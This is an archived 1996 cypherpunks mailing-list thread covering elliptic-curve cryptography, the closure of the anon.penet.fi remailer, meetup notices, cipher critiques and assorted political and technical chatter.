IZNe0mKC7eKS2LpgNpwvJFCZ34HnbQGEuFbThVuZI6fzfvl941p4jA==
=ttLh
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@interactive.visa.com (Tom Rollins)
Date: Sat, 31 Aug 1996 01:14:47 +0800
To: Wyntermute@worldnet.att.net (Justin Card)
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
In-Reply-To: <3225228C.4290@worldnet.att.net>
Message-ID: <199608301402.KAA25385@rootboy.interactive.visa.com>
MIME-Version: 1.0
Content-Type: text


Justin Card wrote:
> I can't remember the elliptic curve system well, but if the parameters
> of the curve are not standard for everyone (which I am afraid they are)
> one method is to pick the point first, then solve for the a & b.
> 
> If this is not the case, finding the square root may be nice or tricky.
> 
> if p=3 mod 4, then the sqrt is
> X^(P+1) mod P, where X is the number you are trying to find the sqrt
> of.  It can be extended to X=5(mod 8) and a few others, but I'm not sure
> how.  There is also a form for X=1 mod 4,but I can't find reference to
> it. Hope this helps

A security issue is selecting an elliptic curve whose order (number
of points on the elliptic curve) is divisible by a large prime number.

I still have to implement this selection process and thus will have
my a and b selections driven by this analysis.

There also could be some bandwidth savings when transmitting an
elliptic curve point to transmitt just the x and the sign bit of y
and let the receiver reconstruct the actual y value.

The choice for prime p could have overall speed benefits by selecting
a p=3 mod 4 that makes the math simpler. This was also in Wei Dai's
ModularSquareRoot C++ code "if(p%4 == 3) return a_exp_b_mod_c(a, (p+1)/4, p);"

-tom
                




-- 
Tom Rollins   <trollins@interactive.visa.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William F. Towey" <liam@webspan.net>
Date: Sat, 31 Aug 1996 01:22:08 +0800
To: cypherpunks@toad.com
Subject: Reprogramming Beepers?
Message-ID: <3226F6E1.2333@webspan.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know how to reprogram a beeper to a new number. Please
Help Brendan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Claborne <claborne@CYBERTHOUGHT.com>
Date: Sat, 31 Aug 1996 04:38:48 +0800
To: mthompso@qualcomm.com
Subject: San Diego CPunk Physical meeting
Message-ID: <2.2.32.19960830173157.002b9cc4@cyberthought.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


<<<<< NOTE! I have a new address!!! >>>>>>

San Diego Area CPUNKS symposium  Thursday, Sep. 21, 1996.

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  We discuss cryptography and other related subjects, have
the special cypherpunk dinner, and unwind after a long day at the grind stone.

   Don't forget to bring your public key  fingerprint.  If you can figure out
how to get it on the back of a business card, that would be cool.  If you want
the suspicious crowd there to sign your key, bring two forms of ID.

Hopefully Lance Cottrell will give us an update on Mixmaster and what's going
on at San Diego's best ISP.  You can also get the scoop on why I resigned from
NCR.  It wouldn't of course be because someone freaked out when I forwarded the
cypherpunk e-mail titled "How to become in international Arms trafficker"...

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend... 

NOTE: My primary e-mail address has changed to use my own domain.  You can 
reach me at "claborne@cyberthought.com". Permanently replace any other address
that you may have for me.  I am currently not subscribed to the CP list since
my current internet connection is slow (I can't afford anything right now :)

     2
 -- C  --


-----BEGIN PGP SIGNATURE-----
Version: 4.0 Personal Edition

iQEVAgUBMicd5IP1MBWQ+9udAQHH8gf+IRwyVgQ1SO9ktTnT1St7g9HUM0HwvZZJ
IxSQxJ57wVfgwcaCaYvUxnrtkhq6fhW77WTrv/IT2rHMlKJGwX6xN3sF24CUKQ5s
Hl3Pxxuqp/HVkXqsQsCdzAGVqrK+DXqbLLJMUSKDLzZUqqfqYA6di8GrB17vNDxT
V6LkTVwZsERlofvlA9d+3aEPlSdxgOP47H9TRtqd/XwVuP3C1h+1QPzq9+uzImkG
/J51rAzh69U8Kt7R/6RF2qMSKw2FwUEWZa5iN4L7RzVyEly68DkWHedu32iAEdoT
v1xqhCnjya457rYvigUEOMZ/Skeb1rOfrdr5UPLY6l/+fwticMbk1Q==
=I4Mj
-----END PGP SIGNATURE-----
                              ...  __o
                             ..   -\<,
Claborne@CYBERTHOUGHT.com    ...(*)/(*)._ Providing thoughts on 
					  your computing problems.
http://www.CYBERTHOUGHT.com/cyberthought/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0  54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.  PGP-encrypted e-mail welcome!
Dreams.  They are just a "screen saver" for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sat, 31 Aug 1996 05:09:56 +0800
To: cypherpunks@toad.com
Subject: Helsingius shuts down anon.penet.fi server in Finland (fwd)
Message-ID: <Pine.3.89.9608301041.A7465-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


This just came over the fight-censorship list.  

---

Zach Babayco
zachb@netcom.com  <----- finger for PGP public key

---------- Forwarded message ----------
Date: Fri, 30 Aug 1996 13:11:56 -0500
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Cc: azeem@dial.pipex.com, jseiger@cdt.org
Subject: Helsingius shuts down anon.penet.fi server in Finland

This is a sad day in the history of the Net. Hundreds of thousands of
people had accounts on Julf's pseudonmyous server and many netizens relied
on it daily to preserve their privacy online. (Unlike cypherpunk remailers,
it's not truly anonymous since Julf keeps records of what anon id maps to
what email address.) From Azeem's report and the press release below,
Julf's move seems to be in response to a Finnish court's preliminary
decision that the privacy remailers could be violated by court order --
something the Scientologists have been pushing.

Still, I'd be surprised if Julf's decision wasn't prompted in part by the
hideous London Observer article that falsely accused him of being a
middleman in the distribution of child porn -- check out a scan of the
Sunday cover at:
  http://scallywag.com/

-Declan


---------- Forwarded message ----------
Date: Fri, 30 Aug 1996 17:11:51 +0100
From: Azeem Azhar <azeem@dial.pipex.com>
To: azeem@ivision.co.uk
Subject: [ALERT] Penet is dead

Hello all,

I just got off the phone with Johann Helsingius who runs the
anon.penet.fi anonymous e-mail service.

1. He has decided to close the service.

2. This is not related to the article in The Observer. It is, in fact,
due to a decision of a lower Finnish court on petition from the Church
of Scientology. Penet went to court last week and made the decision
today. The implication of the decision is that e-mail over the Internet
is not protect by the usual Finnish privacy laws.

3. The server is currently down while Julf re-writes the software. Once
it runs again, it will be phased out for private use, but groups such as
the Samaritans and human rights agencies should be able to use it.

4. They are appealing against the decision.

5. Julf expects that revisions in Finnish law to provide a safe legal
status for anonymous remailers will be in place at the earliest in
Spring next year.

6. Once again: this is unrelated to The Observer's scandalous reporting.


Your faithful furry friend,

Azeem


---------- Forwarded message ----------

Date: Fri, 30 Aug 1996 17:15:41 +0100
From: Azeem Azhar <azeem@dial.pipex.com>
To: azeem@ivision.co.uk
Subject: [ALERT} Penet is dead (correction)

Sorry . . . a slight error:

> 2. This is not related to the article in The Observer. It is, in fact,
> due to a decision of a lower Finnish court on petition from the Church
> of Scientology. Penet went to court last week and made the decision
> today. The implication of the decision is that e-mail over the Internet
> is not protect by the usual Finnish privacy laws.

The implication of the court's decision (rather than Penet's to shut the
server) is that e-mail over the Internet is not protected by the usual
Finnish privacy laws.

Sorry!
--

[Julf's press release. -Declan]

                                PRESS RELEASE
                                30.8.1996


Johan Helsingius closes his Internet remailer

Johan Helsingius from Helsinki has decided to close his Internet
remailer. The so-called anonymous remailer is the most popular
remailer in the world, with over half a million users.

"I will close down the remailer for the time being because the legal
issues governing the whole Internet in Finland are yet undefined. The
legal protection of the users needs to be clarified. At the moment the
privacy of Internet messages is judicially unclear."

The idea of an anonymous remailer is to protect the confidentiality of itís
usersí identity. The remailer itself does not store messages but serves as a
channel for message transmission. The remailer forwards messages
without the identity of the original sender.

Finland is one of the leading countries in Internet usage. Therefore all
decisions and changes made in Finland arouse wide international interest.

"I have developed and maintained the remailer in my free time for over
three years now. It has taken up a lot of time and energy. Internet has
changed a lot in these three years - now there are dozens of remailers in
the world, which offer similar services."

"I have also personally been a target because of the remailer for three
years. Unjustified accusations affect both my job and my private life"
says Johan Helsingius.

He surmises that the closing of the remailer will raise a lot of discussion
among the Internet community. "These remailers have made it possible
for people to discuss very sensitive matters, such as domestic violence,
school bullying or human rights issues anonymously and confidentially
on the Internet. To them the closing of the remailer is a serious problem",
says Helsingius.

Child porn claims proven false

Last Sunday¥s issue of the English newspaper Observer claimed that the
remailer has been used for transmitting child pornography pictures. The
claims have been investigated by the Finnish police. Observer¥s claims
have been found groundless.

Police sergeant Kaj Malmberg from the Helsinki Police Crime Squad is
specialized in investigating computer crimes. He confirms that already a
year ago Johan Helsingius restricted the operations of his remailer so that
it cannot transmit pictures.

"The true amount of child pornography in Internet is difficult to assess,
but one thing is clear: We have not found any cases where child porn
pictures were transmitted from Finland", Kaj Malmberg says.

Ground rules need to be clarified

There are several large network projects going on in Finland at the
moment, such as the TIVEKE project run by the Ministry of
Communications and the Information Society Forum project run by the
Ministry of Finance. Johan Helsingius is participating the work of these
projects. Projects assess the political and social issues of networks and
the impact of these issues in the long run. These projects also need the
support of daily, practical work to help short-term decision-making.

Johan Helsingius is now taking an initiative in the development of the
daily network rules. He wants to set up a task force to discuss the
practical problems related to ethical and civil rights issues in connection
with the Internet.

"I will try to set up a task force which will include Internet
experts together with representatives of civic organizations and
authorities. The task force could take a stand on issues such as the
network¥s practical operation methods and the misuse of the network. I
hope that the results of this task force will support the development of
the network", he says.

For further information, please contact

Johan Helsingius
Oy Penetic Ab
tel. +358 0400 2605
e-mail: julf@penet.fi








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 31 Aug 1996 01:53:31 +0800
To: cypherpunks@toad.com
Subject: Re: PGP & Default
In-Reply-To: <199608300152.DAA18622@basement.replay.com>
Message-ID: <199608301446.KAA04448@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
>    I created a nym with a public key.  Now, it's become the default so
> when I go to send an encrypted message, I get prompted to enter the
> password for my nym key.
>    So, for the $64,000 question: How I can get my *original* public key (the 
> one with my
> "real" email address) to again be the default.

I presume you are using PGP.

There is a configuration file option to do what you want.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 31 Aug 1996 02:03:05 +0800
To: Erle Greer <vagab0nd@sd.cybernex.net>
Subject: Re: Elliptic Curve Y**2 = x**3 + a * x**2 + b
In-Reply-To: <2.2.32.19960830023856.0075c734@mail.sd.cybernex.net>
Message-ID: <199608301450.KAA04467@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Erle Greer writes:
> > 1: How can I take the suqare root mod p ?
> 
> This has what to do with CP?

Yeah, horrible seeing people talk about cryptography on Cyphercesspit.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 31 Aug 1996 05:00:24 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption
Message-ID: <199608301753.KAA21913@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:40 PM 8/30/96 +0200, Germano Caronni <caronni@tik.ee.ethz.ch> wrote:
>Dale Thorn wrote:
>> Algorithm: Select bit-groups of random length from the file until the file is
>>            completely processed.  Shuffle the bits in each group randomly and
>>            save each group back to the file. Repeat if needed using different
>>            key-strings for each successive encryption, for increased
security.
>Very nice. There are just two little issues:
>a) How do you generate the random bytes?
>b) How do you transmit them to the other side, without having a secure channel?

I agree.   This method can be looked at as two parts:
1) Generate a stream of random numbers
2) Use the stream to transform the plaintext into cyphertext by shuffling.

Generating a stream of random numbers can be done by cryptographically
strong methods, or by physical methods such as throwing dice or counting 
gamma rays, or by cryptographically weak methods such as using the RANDOM
function provided by your BASIC compiler.  If you're using strong crypto,
the method is strong if the transform is strong.   If you're using physical
randomness, that's also true, and you'll definitely need to use 
agents with briefcases handcuffed to their arms to haul the randoms around,
which doesn't gain you much operational security, since the random stream
needs to be longer than the plaintext.  If you're using weak crypto,
we can use those fast computers you're so impressed with to try
all 32767 or 2**32 random streams on your input to see what works -
brute force isn't that hard when you've got a small keyspace,
even if you don't take advantage of the special forms (e.g. there are
good methods for reversing linear congruential multiplicative generators.)

How long a stream of random numbers do you need to do the transform?
And how secure _is_ the transform?  For a simple XOR, you know that
each bit in the stream will diddle one bit in the plaintext,
so you're fine (as long as you only use the random stream once.)
But for your shuffling method, you'd have to shuffle much longer
to make sure that the "random" selection of bitgroups hits all the bits,
and hits them often enough that adjacent bits will be separated.
For instance, if your message is a 3000-word set of instructions
to your fellow plotters, you need to be sure that the phrases
"gunpowder", "Parliament", and "November 5th" get shredded, not merely
moved to different places in the document.  This takes much longer
than deterministic methods, and risks not being as good.

There are some advantages with the shuffling method - assuming you've 
cranked the system long enough to really shred everything,
it's hard to take cyphertext and reconstruct plaintext, and 
brute force is a bit more work than with a deterministic method
that uses one pass.  But you can get that effect by using
stronger methods, such as the
        des | tran | des | tran | des
where "tran" is a simple key-or-input-driven shuffle that
doesn't need to be totally strong.  (Is Carl Ellison the person
who proposed this?  I've forgotten.)  


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Sat, 31 Aug 1996 04:47:45 +0800
To: cypherpunks@toad.com
Subject: Re: Intel to rule the basic crypto engine market?
Message-ID: <199608301806.LAA22022@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:27 PM 8/29/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>The one kind of standardization in the crypto market that we truly need, 
>NOW, is a standard format/protocol so that crypto telephones from all 
>manufacturers can talk to each other.  The last thing we need is a 
>tower-of-Babel situation, which would be even worse than the VHS/Beta wars 
>of 20-10 years ago.

I think it'll be a while before we're at that point - there's too much
experimenting to do, and too many different options of crypto and
voice compression that are useful in different situations.
Simple issues like Internet vs. modem vs. frame relay vs. cellphone
make a radical difference in performance.

A standardized _option_negotiation_ method would be valuable;
that would at least let systems figure out if they can talk
as well as exchanging keys.   You can use PGPtalk if you want
a single standard program that will often work - for now the best
approach for non-hardware-based systems is probably to have
several popular encrypted phone programs, and negotiate by
voice which ones to use :-)

The non-crypto-internet-phone business has been in a similar bind,
but Intel's announcement that H.323 shall be the One True Standard
may get enough support to cut through that.  Is there some hook
in their system that could make it easy to add encryption,
or do we need to design Internet-Crypto-Phones that recycle the
H.323 from Intel but add several layers of wrapper around them?

(ITU standards being what they are, I haven't yet found an on-line
source of the document, and the ITU itself has a badly organized web
site that lets you order paper copies of the documents by mailing paper
Swiss Francs to them, which is annoying.  (It could at least do
SSL web forms and Visa cards or something.)  And Intel's free reference
implementation needs Win95, which I'm not running.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Reassign Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Sat, 31 Aug 1996 02:46:13 +0800
To: attila@primenet.com
Subject: Re: Selling your sole to DOJ ...err, devil   Zimmermann?
Message-ID: <199608301539.IAA16829@dfw-ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:20 AM 8/30/96 GMT, attila@primenet.com ranted:
>        
>        Zimmermann is a political flake, a warmed over 60s
>    liberal. 
>      <snip>
>        I would find it difficult, despite his apparent altruism
>    and left-over 60s need for redress, to believe that
>    Zimmermann's coding of PGP was other than a commercial
>    stepping stone (judging from both his prior and later 
>    actions); and,
>

I guess that according to the Code of Attila, us left over 60's liberals are
prohibited
from any commercial commerce.

mjw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 31 Aug 1996 03:06:46 +0800
To: cypherpunks@toad.com
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <2.2.32.19960830155849.00895228@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Better late than never:

At 08:43 AM 5/7/96 -0400, Clay Olbon II wrote:
>There are a couple of main reasons that the poor spend more than their
>reported income.  First, many of the elderly are included in the "poorest
>20%", since this is based on income alone and not net worth.  Many of the
>elderly are spending down their retirement savings.

Also students living on loans, grants, and gifts.  Also members of the
retail pharmaceutical trade living on their markup.

>Another factor, of
>course, is that welfare, food stamps, free/subsidized housing and other
>transfer payments are not included in income calculations.  I have seen
>reports that show that in many states, this is equivalent to a full-time
>job paying ~$9/hr.

The Cato Institute Study.  AFDC+Food Stamps+Housing Assistance+Medicaid+WIC
= a fair chunk of change when compared to the taxed earnings from work.
Equivalent to the take-home pay from a $16/hour job in NYC (mostly because
of health insurance).  The commies complained that the study didn't account
for the fact that the working poor can also get food stamps and Earned
Income Tax Credit.  Of course, if you just establish the value of welfare
benefits, you are doing a lot.  

>Not showing these as income helps keep the "official"
>poverty rate high.  I'm not sure if social security is included in income
>calculations for "poverty rate" purposes, anyone know?

The poverty rate calculations (how many people below the poverty level?) do
not include SS or welfare cash or non-cash benefits.  Thus people are not as
poor as claimed even ignoring unreported income from legal and illegal
employment.

Adding everything up, we find that poor households spend twice what they
officially report taking in.  Hardly surprising since if one has a low
income, one unreported job in the household can double that income.  It is
also likely that a higher proportion of the income and assets of the poor
are not recorded (as against the rich) because most of the assets are
personalty rather than realty and they are less likely to be audited, etc.

So the level of income and asset inequality in America is less than you will
have heard.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Claborne <claborne@CYBERTHOUGHT.com>
Date: Sat, 31 Aug 1996 06:02:57 +0800
To: mthompso@qualcomm.com
Subject: San Diego CPunk Physical meeting!!!!!
Message-ID: <2.2.32.19960830190803.002b4df4@cyberthought.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


<<<<< NOTE! I have a new address!!! >>>>>>

Change in DATE.  sorry ------> Sep 5, Next Thursday!!!

San Diego Area CPUNKS symposium  Thursday, Sep. 5, 1996.

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  We discuss cryptography and other related subjects, have
the special cypherpunk dinner, and unwind after a long day at the grind stone.

   Don't forget to bring your public key  fingerprint.  If you can figure out
how to get it on the back of a business card, that would be cool.  If you want
the suspicious crowd there to sign your key, bring two forms of ID.

Hopefully Lance Cottrell will give us an update on Mixmaster and what's going
on at San Diego's best ISP.  You can also get the scoop on why I resigned from
NCR.  It wouldn't of course be because someone freaked out when I forwarded the
cypherpunk e-mail titled "How to become in international Arms trafficker"...

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend... 

NOTE: My primary e-mail address has changed to use my own domain.  You can 
reach me at "claborne@cyberthought.com". Permanently replace any other address
that you may have for me.  I am currently not subscribed to the CP list since
my current internet connection is slow (I can't afford anything right now :)

     2
 -- C  --

-----BEGIN PGP SIGNATURE-----
Version: 4.0 Personal Edition

iQEVAgUBMic8AYP1MBWQ+9udAQFSDQf8CXxsoBlLZIpXORcT2pkRYO67eFgVQehU
9Mzc1uVyb9k8JKzID4zMEEuRiUF38GMaVC9PJdmSGObzulhpduNgRwu15bXDPK80
gf4El696ncHqRqPNBZw+6JXWuNbotryZUVVAr+98LgwViP4jm6/U8KCkWd5scjll
gfxQi7vxXCAAz1lGf6N+NZhP54m37PbTIkyXu59M2Js85LlVLZ0nY+aSsebjVzXt
ojCn6QQKnq4Zns9bxxuhm71AmyVhT09cKzgwR8xrnCPOXLAvtx6m7a0q1rBbqh+Y
QiNT95YmJovOIgtUB+xCa706W1X4N1MqPD36n1S5lumhSrCiPBg9jg==
=l4SF
-----END PGP SIGNATURE-----
                              ...  __o
                             ..   -\<,
Claborne@CYBERTHOUGHT.com    ...(*)/(*)._ Providing thoughts on 
					  your computing problems.
http://www.CYBERTHOUGHT.com/cyberthought/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0  54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.  PGP-encrypted e-mail welcome!
Dreams.  They are just a "screen saver" for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 31 Aug 1996 06:06:43 +0800
To: cypherpunks@toad.com
Subject: Penet Bites the Dust
Message-ID: <199608301913.MAA22151@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


An interesting Net tidbit.  Note that the "International Conference
on Child Sexual Exploitation" in Stolkholm which served as a platform
for these accusations and various coordinated stories in numerous
media outlets is simply a circus put on by ECPAT, a well-known
pressure group whose propaganda is modeled after the now-defunct 
National Coalition on Pornography, and whose spurious and laughable
claims about child pornography and vast pedophile conspiracies would fill 
volumes.  The only odd thing here is that the mainstream press is
presenting this gathering with a perfectly straight face, as if it were
some sort of credible event, which of course it is not. 

-----

   HELSINKI (Reuter) - A Finnish Internet specialist said on Friday he
   was closing his remailer, or anonymous forwarding system, after
   rejecting allegations it was being used as a conduit for child
   pornography.
   
   Johan Helsingius, whose remailer is one of the largest in the world
   with over half a million users, said in a statement he was closing
   down the system because the legal issues governing the Internet in
   Finland are unclear.
   
   ``The legal protection of users needs to be clarified. At the moment
   the privacy of Internet messages is judicially unclear,'' said
   Helsingius, who said he set up and ran the remailer in his free time
   partly as an initiative to help abused children.
   
   Internet remailers are computers which receive and forward messages
   with a pseudonym or anonymous source.
   
   There are about five large ones in the world, and they exist to enable
   anonymous discussion of sensitive subjects -- for instance by victims
   of child abuse, potential suicides or people in politically repressed
   societies.
   
   Helsingius, supported by Finnish police, earlier this week dismissed
   claims in Britain's Observer Sunday newspaper that his remailing
   system handled up to 90 percent of child pornography on the Internet.
   
   ``I have also personally been a target because of the remailer for
   three years,'' he said on Friday. ``Unjustified accusations affect
   both my job and my private life.''
   
   The newspaper reported the charges, by a U.S. policeman and FBI
   adviser, as Belgian police were investigating horrific child sex
   crimes and ahead of an international conference in Stockholm on the
   commercial sexual exploitation of children.
   
   In Helsingius's statement, Helsinki police sergeant Kaj Malmberg was
   quoted as saying he had found no evidence of child porn being
   transmitted from Finland.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 31 Aug 1996 06:26:34 +0800
To: Jim Choate <cypherpunks@toad.com
Subject: Re: **"OuR" Project press release** (fwd)
Message-ID: <199608301928.MAA02910@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>Forwarded message:
>> Subject: (Fwd) Re: **"OuR" Project press release**
>> Priority: normal
>> X-mailer: Pegasus Mail for Windows (v2.23)
>> Pulled this off of the net.  The was even better than SkyeDance IV ;-)
>> ------- Forwarded Message Follows -------
>> Paul Robinson & Ken Mizoi wrote:
>> > To All Fellow Rocketeers:
[stuff deleted]
>> >         Unfortunately, the rocket failed to deploy its recovery systems and
>> > accelerated to over Mach 1 and impacted into the sand dunes several
>> > miles away.  There was a loud sonic boom heard by all that literally
>> > shook the earth.  In fact, instead of the nominal "hole and fin slits"
>> > seen in previous impacts, there was a twenty foot diameter area with
>> > large chunks of sheared earth as if a high energy charge had been
>> > detonated under the ground.  The rocket was not recovered, but several
>> > pieces of metal, fiberglass, and burnt Nomex were found indicating the
>> > ejection charges did in fact fire.
>> >         Once again, the "OuR" Project members wish to express sincere thanks
>> > to all those who listened, donated, and gave their support who were
>> > not specifically named.  This project would not have flown if were not
>> > for the "believers" and the tremendous team spirit.  Only they know
>> > the sweat and the number of hours it takes to fly such a rocket.
>> >                                                         Members of the "OuR" Team 
>> -----------------
>> Stu Barrett
>> e-mail: stu@zilker.net


Recommendation for the next one:  Rather than try to brute force  an LEO 
from about sea level, how about  lofting the rocket by balloon up to a 
starting altitude of, say, 100,000 feet, and letting'er'rip from there?  
(this is probably not a new technique...)

Using a hydrogen balloon, a cubic meter of balloon volume would loft 1.2 
kilograms at sea level, although only 1/50th of that at 100,000 feet, or 25 
grams.  A 700-pound (320 kilogram)rocket would require 12,000 cubic meters of 
envelope volume, discounting the weight of the balloon itself, equivalent to 
the volume of a cube 25 meters on a side.  

Obvious advantages:  First, you're 20 miles closer to an LEO altitude of 
about 200 miles or so, a considerable advantage.  Even more important, 
my back-of-the-envelope calculation says that at 100,000 feet, you're above 
about 98% of the atmosphere.  There'd be a minor advantage if you managed to 
find a 300 mph easterly airstream just before launch.

(Derived from the numbers included in the original note, I assume that the 
average upward speed is 1000 feet per second, and a top speed of about 2000 
feet per second reached at an altitude of about 10,000 feet (Mach 2).   This 
peak velocity occurs when the barometric pressure is not greatly different 
than sea level, which is a huge waste of energy.    I'd like to see the real 
numbers, or at least a simulation.  Could they re-run the simulation for a 
starting altitude of 100,000 feet?)

And I don't think they have a prayer of doing an LEO without substantially 
increasing the proportion of fuel in the rocket from their current 35%, and 
possibly doing a two-stage rocket. 

I'd like to hear much more about this.

 


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Sat, 31 Aug 1996 06:51:40 +0800
To: Liam@webspan.net
Subject: Re: Reprogramming Beepers?
In-Reply-To: <Pine.BSD.3.92.960830143925.25311A-100000@miso.wwa.com>
Message-ID: <Pine.SUN.3.94.960830124632.1792B-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Comrade,

> Does anyone know how to reprogram a beeper to a new number. Please
> Help Brendan
 
The Cypherpunks wouldn't be the list to ask this unless you are 
using encryption for your RadioMail pagers <g>

The best place I could forward you to would be L0pht at:

http://www.l0pht.com

and there is some information on pagers last I checked.


William Knowles
erehwon@c2.net

--
William Knowles    <erehwon@c2.net>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote for Harry Browne in November -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Sat, 31 Aug 1996 07:29:41 +0800
To: cypherpunks@toad.com
Subject: Re: Reprogramming Beepers?
Message-ID: <199608302046.NAA03041@scn.org>
MIME-Version: 1.0
Content-Type: text/plain


>
>Does anyone know how to reprogram a beeper to a new number. Please
>Help Brendan

Are you talking about the beeper's ESN or CAP code? changing it to another
that is active?

Or reconfiguring the beeper company's system?


--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Sat, 31 Aug 1996 05:35:09 +0800
To: cypherpunks@toad.com
Subject: anon.penet.fi closing down
Message-ID: <2.2.32.19960830182343.006b93a8@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


This was just posted:
---------
Path:
szdc-e!imci3!newsfeed.internetmci.com!newsxfer2.itd.umich.edu!agate!news.Sta
nford.EDU!not-for-mail
From: rcgraves@ix.netcom.com (Rich Graves)
Newsgroups: comp.org.eff.talk,alt.religion.scientology,alt.privacy.anon-server
Subject: penet.fi closing down
Followup-To: alt.privacy.anon-server
Date: 30 Aug 1996 09:49:40 -0700
Organization: Unaffiliated Fans of Nizkor, http://www.nizkor.org/
Lines: 87
Sender: llurch@Networking.Stanford.EDU
Distribution: inet
Message-ID: <507634$kj8@Networking.Stanford.EDU>
NNTP-Posting-Host: networking.stanford.edu
Xref: szdc-e comp.org.eff.talk:16082 alt.religion.scientology:115080
alt.privacy.anon-server:2691

Attributions deleted on request.

-rich

				PRESS RELEASE
				30.8.1996     


Johan Helsingius closes his Internet remailer

Johan Helsingius from Helsinki has decided to close his Internet 
remailer. The so-called anonymous remailer is the most popular 
remailer in the world, with over half a million users. 

"I will close down the remailer for the time being because the legal 
issues governing the whole Internet in Finland are yet undefined. The 
legal protection of the users needs to be clarified. At the moment the 
privacy of Internet messages is judicially unclear."

The idea of an anonymous remailer is to protect the confidentiality of its
users' identity. The remailer itself does not store messages but serves as a 
channel for message transmission. The remailer forwards messages 
without the identity of the original sender.

Finland is one of the leading countries in Internet usage. Therefore all 
decisions and changes made in Finland arouse wide international interest.

"I have developed and maintained the remailer in my free time for over 
three years now. It has taken up a lot of time and energy. Internet has 
changed a lot in these three years - now there are dozens of remailers in 
the world, which offer similar services."

"I have also personally been a target because of the remailer for three 
years. Unjustified accusations affect both my job and my private life"
says Johan Helsingius.

He surmises that the closing of the remailer will raise a lot of discussion 
among the Internet community. "These remailers have made it possible 
for people to discuss very sensitive matters, such as domestic violence, 
school bullying or human rights issues anonymously and confidentially 
on the Internet. To them the closing of the remailer is a serious problem",
